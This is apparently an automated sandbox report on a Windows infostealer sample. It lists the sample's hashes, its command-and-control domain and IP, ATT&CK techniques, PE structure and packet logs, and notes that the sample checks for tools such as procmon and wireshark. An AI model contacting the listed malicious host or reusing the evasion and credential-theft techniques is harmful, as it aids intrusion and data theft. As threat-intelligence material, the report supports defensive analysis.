Source: C:\Users\user\Desktop\A3nofpjN9A.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: A3nofpjN9A.exe, 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmp, A3nofpjN9A.exe, 00000000.00000003.2068974561.00000000072C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: procmon.exe
Source: A3nofpjN9A.exe, 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmp, A3nofpjN9A.exe, 00000000.00000003.2068974561.00000000072C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: wireshark.exe

Stealing of Sensitive Information

barindex
Infostealer behavior detected
Source: Signature ResultsSignatures: Mutex created, HTTP post and idle behavior
Leaks process information
Source: global trafficTCP traffic: 192.168.2.5:49705 -> 81.29.149.125:80

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		1
Process Injection		24
Virtualization/Sandbox Evasion		OS Credential Dumping741
Security Software Discovery		1
Exploitation of Remote Services		11
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		1
Process Injection		LSASS Memory24
Virtualization/Sandbox Evasion		Remote Desktop Protocol1
Data from Local System		2
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information		Security Account Manager13
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
Obfuscated Files or Information		NTDS1
Remote System Discovery		Distributed Component Object ModelInput Capture4
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
Software Packing		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials216
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
A3nofpjN9A.exe61%ReversingLabsWin32.Trojan.CryptBot
A3nofpjN9A.exe44%VirustotalBrowse
A3nofpjN9A.exe100%AviraTR/Crypt.TPM.Gen
A3nofpjN9A.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862E0%Avira URL Cloudsafe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0%Avira URL Cloudsafe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862u0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
home.fiveth5ht.top
81.29.149.125
truefalse
    		high
    httpbin.org
    		3.218.7.103
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862false
        		high
        https://httpbin.org/ipfalse
          		high

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://curl.se/docs/hsts.htmlA3nofpjN9A.exe, 00000000.00000003.2068974561.00000000072C0000.00000004.00001000.00020000.00000000.sdmpfalse
            		high
            http://home.fiveth5ht.top/OyKvQA3nofpjN9A.exe, 00000000.00000002.2204472447.00000000017DF000.00000004.00000020.00020000.00000000.sdmpfalse
              		high
              http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17A3nofpjN9A.exe, 00000000.00000003.2068974561.00000000072C0000.00000004.00001000.00020000.00000000.sdmpfalse
                		high
                http://html4/loose.dtdA3nofpjN9A.exe, 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmp, A3nofpjN9A.exe, 00000000.00000003.2068974561.00000000072C0000.00000004.00001000.00020000.00000000.sdmpfalse
                  		high
                  https://httpbin.org/ipbeforeA3nofpjN9A.exe, 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmp, A3nofpjN9A.exe, 00000000.00000003.2068974561.00000000072C0000.00000004.00001000.00020000.00000000.sdmpfalse
                    		high
                    http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862EA3nofpjN9A.exe, 00000000.00000003.2170407764.0000000001787000.00000004.00000020.00020000.00000000.sdmp, A3nofpjN9A.exe, 00000000.00000003.2170387270.0000000001782000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://curl.se/docs/http-cookies.htmlA3nofpjN9A.exe, A3nofpjN9A.exe, 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmp, A3nofpjN9A.exe, 00000000.00000003.2068974561.00000000072C0000.00000004.00001000.00020000.00000000.sdmpfalse
                      		high
                      https://curl.se/docs/hsts.html#A3nofpjN9A.exefalse
                        		high
                        http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSA3nofpjN9A.exe, 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmpfalse
                          		high
                          http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862uA3nofpjN9A.exe, 00000000.00000003.2170407764.0000000001787000.00000004.00000020.00020000.00000000.sdmp, A3nofpjN9A.exe, 00000000.00000002.2204245896.0000000001789000.00000004.00000020.00020000.00000000.sdmp, A3nofpjN9A.exe, 00000000.00000003.2170387270.0000000001782000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://curl.se/docs/alt-svc.htmlA3nofpjN9A.exe, 00000000.00000003.2068974561.00000000072C0000.00000004.00001000.00020000.00000000.sdmpfalse
                            		high
                            http://.cssA3nofpjN9A.exe, 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmp, A3nofpjN9A.exe, 00000000.00000003.2068974561.00000000072C0000.00000004.00001000.00020000.00000000.sdmpfalse
                              		high
                              http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=A3nofpjN9A.exe, A3nofpjN9A.exe, 00000000.00000003.2169724733.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, A3nofpjN9A.exe, 00000000.00000003.2169437946.00000000017F4000.00000004.00000020.00020000.00000000.sdmp, A3nofpjN9A.exe, 00000000.00000002.2204540533.0000000001800000.00000004.00000020.00020000.00000000.sdmp, A3nofpjN9A.exe, 00000000.00000003.2169602744.00000000017F6000.00000004.00000020.00020000.00000000.sdmp, A3nofpjN9A.exe, 00000000.00000003.2170003230.00000000017FF000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://.jpgA3nofpjN9A.exe, 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmp, A3nofpjN9A.exe, 00000000.00000003.2068974561.00000000072C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                		high

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                81.29.149.125
                                		home.fiveth5ht.topSwitzerland
                                		39616COMUNICA_IT_SERVICESCHfalse
                                3.218.7.103
                                		httpbin.orgUnited States
                                		14618AMAZON-AESUSfalse

                                General Information

                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1581601
                                Start date and time:2024-12-28 09:46:09 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 6m 16s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:4
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:A3nofpjN9A.exe
                                renamed because original name is a hash value
                                Original Sample Name:2115e3fbda695f11af734c24ee699e6d.exe
                                Detection:MAL
                                Classification:mal100.troj.spyw.evad.winEXE@1/0@6/2
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:Failed
                                Cookbook Comments:
                                • Found application associated with file extension: .exe

                                Warnings

                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                • Excluded IPs from analysis (whitelisted): 13.107.246.63, 52.149.20.212
                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                03:47:10API Interceptor3x Sleep call for process: A3nofpjN9A.exe modified

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                81.29.149.125QMtCX5RLOP.exeGet hashmaliciousUnknownBrowse
                                • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                s8kPMNXOZY.exeGet hashmaliciousUnknownBrowse
                                • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                GjZewfxHTi.exeGet hashmaliciousUnknownBrowse
                                • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                sYPORwmgwQ.exeGet hashmaliciousUnknownBrowse
                                • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                xdeRtWCeNH.exeGet hashmaliciousUnknownBrowse
                                • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                3.218.7.103j2nLC29vCy.exeGet hashmaliciousLummaCBrowse
                                  vUcZzNWkKc.exeGet hashmaliciousLummaCBrowse
                                    GjZewfxHTi.exeGet hashmaliciousUnknownBrowse
                                      xdeRtWCeNH.exeGet hashmaliciousUnknownBrowse
                                        E205fJJS1Q.exeGet hashmaliciousLummaCBrowse
                                          w22319us3M.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                            QzK1LCSuq2.exeGet hashmaliciousLummaCBrowse
                                              OoYYtngD7d.exeGet hashmaliciousUnknownBrowse
                                                NWJ4JvzFcs.exeGet hashmaliciousUnknownBrowse
                                                  EwhnoHx0n5.exeGet hashmaliciousUnknownBrowse

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    httpbin.orgQMtCX5RLOP.exeGet hashmaliciousUnknownBrowse
                                                    • 34.226.108.155
                                                    j2nLC29vCy.exeGet hashmaliciousLummaCBrowse
                                                    • 3.218.7.103
                                                    es5qBEFupj.exeGet hashmaliciousLummaCBrowse
                                                    • 34.226.108.155
                                                    s8kPMNXOZY.exeGet hashmaliciousUnknownBrowse
                                                    • 34.226.108.155
                                                    vUcZzNWkKc.exeGet hashmaliciousLummaCBrowse
                                                    • 3.218.7.103
                                                    GjZewfxHTi.exeGet hashmaliciousUnknownBrowse
                                                    • 3.218.7.103
                                                    sYPORwmgwQ.exeGet hashmaliciousUnknownBrowse
                                                    • 34.226.108.155
                                                    CLaYpUL3zw.exeGet hashmaliciousLummaCBrowse
                                                    • 34.226.108.155
                                                    xdeRtWCeNH.exeGet hashmaliciousUnknownBrowse
                                                    • 3.218.7.103
                                                    f7qbEfJl0B.exeGet hashmaliciousUnknownBrowse
                                                    • 34.226.108.155
                                                    home.fiveth5ht.topQMtCX5RLOP.exeGet hashmaliciousUnknownBrowse
                                                    • 81.29.149.125
                                                    s8kPMNXOZY.exeGet hashmaliciousUnknownBrowse
                                                    • 81.29.149.125
                                                    GjZewfxHTi.exeGet hashmaliciousUnknownBrowse
                                                    • 81.29.149.125
                                                    sYPORwmgwQ.exeGet hashmaliciousUnknownBrowse
                                                    • 81.29.149.125
                                                    xdeRtWCeNH.exeGet hashmaliciousUnknownBrowse
                                                    • 81.29.149.125
                                                    f7qbEfJl0B.exeGet hashmaliciousUnknownBrowse
                                                    • 5.101.3.217
                                                    5KwhHEdmM4.exeGet hashmaliciousUnknownBrowse
                                                    • 5.101.3.217
                                                    dZsdMl5Pwl.exeGet hashmaliciousUnknownBrowse
                                                    • 5.101.3.217
                                                    BkB1ur7aFW.exeGet hashmaliciousUnknownBrowse
                                                    • 5.101.3.217
                                                    OoYYtngD7d.exeGet hashmaliciousUnknownBrowse
                                                    • 5.101.3.217

                                                    ASNs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    COMUNICA_IT_SERVICESCHQMtCX5RLOP.exeGet hashmaliciousUnknownBrowse
                                                    • 81.29.149.125
                                                    s8kPMNXOZY.exeGet hashmaliciousUnknownBrowse
                                                    • 81.29.149.125
                                                    GjZewfxHTi.exeGet hashmaliciousUnknownBrowse
                                                    • 81.29.149.125
                                                    sYPORwmgwQ.exeGet hashmaliciousUnknownBrowse
                                                    • 81.29.149.125
                                                    xdeRtWCeNH.exeGet hashmaliciousUnknownBrowse
                                                    • 81.29.149.125
                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYSBrowse
                                                    • 81.29.149.45
                                                    hmips.elfGet hashmaliciousUnknownBrowse
                                                    • 81.29.149.178
                                                    ppc.elfGet hashmaliciousUnknownBrowse
                                                    • 81.29.149.178
                                                    mips.elfGet hashmaliciousUnknownBrowse
                                                    • 81.29.149.178
                                                    x86.elfGet hashmaliciousUnknownBrowse
                                                    • 81.29.149.178
                                                    AMAZON-AESUSQMtCX5RLOP.exeGet hashmaliciousUnknownBrowse
                                                    • 34.226.108.155
                                                    j2nLC29vCy.exeGet hashmaliciousLummaCBrowse
                                                    • 3.218.7.103
                                                    es5qBEFupj.exeGet hashmaliciousLummaCBrowse
                                                    • 34.226.108.155
                                                    s8kPMNXOZY.exeGet hashmaliciousUnknownBrowse
                                                    • 34.226.108.155
                                                    vUcZzNWkKc.exeGet hashmaliciousLummaCBrowse
                                                    • 3.218.7.103
                                                    GjZewfxHTi.exeGet hashmaliciousUnknownBrowse
                                                    • 3.218.7.103
                                                    sYPORwmgwQ.exeGet hashmaliciousUnknownBrowse
                                                    • 34.226.108.155
                                                    CLaYpUL3zw.exeGet hashmaliciousLummaCBrowse
                                                    • 34.226.108.155
                                                    xdeRtWCeNH.exeGet hashmaliciousUnknownBrowse
                                                    • 3.218.7.103
                                                    https://fin.hiringplatform.ca/processes/197662-tax-legislation-officer-ec-06-ec-07?locale=enGet hashmaliciousUnknownBrowse
                                                    • 54.225.146.64

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    No created / dropped files found

                                                    Static File Info

                                                    General

                                                    File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                    Entropy (8bit):7.984161071034882
                                                    TrID:
                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                    • DOS Executable Generic (2002/1) 0.02%
                                                    • VXD Driver (31/22) 0.00%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:A3nofpjN9A.exe
                                                    File size:4'482'048 bytes
                                                    MD5:2115e3fbda695f11af734c24ee699e6d
                                                    SHA1:334ace427d9b4e6a95ea977e31c8060c3e3eb54c
                                                    SHA256:a782e6fb792b210e82802ac312542a670a37f4668031418875db91a4c9dfd5be
                                                    SHA512:7f198dce8e11febbd0240783fcb167852bf61c363c86f9493f7fe229fb600130b7a1697ef168d26f767319d081b4798c8584c3e08ee476483e330e74c9bf6738
                                                    SSDEEP:98304:l6K88R3RbvX59VfoLNuqfCxpK4N7URJT6S9Rjf/J8Zvx:lV88fX53foLnqvsN6S/jfKZv
                                                    TLSH:732633969A0F669FC24D4F7E0985E2ED9017B51FD8C63B4A28D42E20177C6FEB2D4087
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._.lg...............(..I...p..2........... I...@...................................D...@... ............................

                                                    File Icon

                                                    Icon Hash:00928e8e8686b000

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x102e000
                                                    Entrypoint Section:.taggant
                                                    Digitally signed:true
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                                    DLL Characteristics:DYNAMIC_BASE
                                                    Time Stamp:0x676CDB5F [Thu Dec 26 04:28:15 2024 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                    Authenticode Signature

                                                    Signature Valid:
                                                    Signature Issuer:
                                                    Signature Validation Error:
                                                    Error Number:
                                                    Not Before, Not After
                                                      Subject Chain
                                                        Version:
                                                        Thumbprint MD5:
                                                        Thumbprint SHA-1:
                                                        Thumbprint SHA-256:
                                                        Serial:

                                                        Entrypoint Preview

                                                        Instruction
                                                        jmp 00007F5FC096F03Ah
                                                        cmovb eax, dword ptr [eax+eax+00h]
                                                        add byte ptr [eax], al
                                                        add cl, ch
                                                        add byte ptr [eax], ah
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x6dd05f0x73.idata
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x6dc0000x1ac.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x708a000x688
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xc2cb400x10jqefefdt
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0xc2caf00x18jqefefdt
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        0x10000x6db0000x288a0090866d48ad5a6acfda7a178351d9f452unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .rsrc0x6dc0000x1ac0x20003bd0fb364e7fd99bf64365f4a41b430False0.583984375data4.594545029539049IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .idata 0x6dd0000x10000x2006363462e4ea156e03144265f6be7871eFalse0.166015625data1.1763897754724144IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        0x6de0000x3950000x2001d81612b6cbdb994e9c20584518336e9unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        jqefefdt0xa730000x1ba0000x1b9e00d81169eb09bc45e6891c3124aac8058bFalse0.9944594236209335data7.955450902362483IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        rpjpprvb0xc2d0000x10000x400f3986ec00586215e537716b1dfae1d82False0.7705078125data6.039967443833545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .taggant0xc2e0000x30000x22000a08e087f740ea354d79021606b09e27False0.006433823529411764DOS executable (COM)0.019571456231530684IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                        Resources

                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                        RT_MANIFEST0xc2cb500x152ASCII text, with CRLF line terminators0.6479289940828402

                                                        Imports

                                                        DLLImport
                                                        kernel32.dlllstrcpy

                                                        Network Behavior

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Dec 28, 2024 09:47:04.338615894 CET49704443192.168.2.53.218.7.103
                                                        Dec 28, 2024 09:47:04.338665962 CET443497043.218.7.103192.168.2.5
                                                        Dec 28, 2024 09:47:04.338732004 CET49704443192.168.2.53.218.7.103
                                                        Dec 28, 2024 09:47:04.366725922 CET49704443192.168.2.53.218.7.103
                                                        Dec 28, 2024 09:47:04.366753101 CET443497043.218.7.103192.168.2.5
                                                        Dec 28, 2024 09:47:06.168766975 CET443497043.218.7.103192.168.2.5
                                                        Dec 28, 2024 09:47:06.169466019 CET49704443192.168.2.53.218.7.103
                                                        Dec 28, 2024 09:47:06.169487953 CET443497043.218.7.103192.168.2.5
                                                        Dec 28, 2024 09:47:06.170942068 CET443497043.218.7.103192.168.2.5
                                                        Dec 28, 2024 09:47:06.171013117 CET49704443192.168.2.53.218.7.103
                                                        Dec 28, 2024 09:47:06.172514915 CET49704443192.168.2.53.218.7.103
                                                        Dec 28, 2024 09:47:06.172585964 CET443497043.218.7.103192.168.2.5
                                                        Dec 28, 2024 09:47:06.185637951 CET49704443192.168.2.53.218.7.103
                                                        Dec 28, 2024 09:47:06.185645103 CET443497043.218.7.103192.168.2.5
                                                        Dec 28, 2024 09:47:06.239243031 CET49704443192.168.2.53.218.7.103
                                                        Dec 28, 2024 09:47:07.820848942 CET443497043.218.7.103192.168.2.5
                                                        Dec 28, 2024 09:47:07.820961952 CET443497043.218.7.103192.168.2.5
                                                        Dec 28, 2024 09:47:07.821038961 CET49704443192.168.2.53.218.7.103
                                                        Dec 28, 2024 09:47:07.830033064 CET49704443192.168.2.53.218.7.103
                                                        Dec 28, 2024 09:47:07.830056906 CET443497043.218.7.103192.168.2.5
                                                        Dec 28, 2024 09:47:09.741975069 CET4970580192.168.2.581.29.149.125
                                                        Dec 28, 2024 09:47:09.861536026 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:09.861751080 CET4970580192.168.2.581.29.149.125
                                                        Dec 28, 2024 09:47:09.863173008 CET4970580192.168.2.581.29.149.125
                                                        Dec 28, 2024 09:47:09.982848883 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:09.982867956 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:09.982884884 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:09.982892990 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:09.982919931 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:09.982937098 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:09.983042955 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:09.983051062 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:09.983083963 CET4970580192.168.2.581.29.149.125
                                                        Dec 28, 2024 09:47:09.983098984 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:09.983108997 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:09.983198881 CET4970580192.168.2.581.29.149.125
                                                        Dec 28, 2024 09:47:10.102936983 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:10.102982044 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:10.103003979 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:10.103013992 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:10.103025913 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:10.103059053 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:10.103184938 CET4970580192.168.2.581.29.149.125
                                                        Dec 28, 2024 09:47:10.146895885 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:10.147089005 CET4970580192.168.2.581.29.149.125
                                                        Dec 28, 2024 09:47:10.266880035 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:10.266980886 CET4970580192.168.2.581.29.149.125
                                                        Dec 28, 2024 09:47:10.310796976 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:10.434886932 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:10.434950113 CET4970580192.168.2.581.29.149.125
